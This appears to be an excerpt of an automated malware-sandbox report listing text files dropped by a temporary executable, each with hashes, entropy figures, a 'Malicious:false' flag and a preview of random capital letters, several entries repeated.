                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
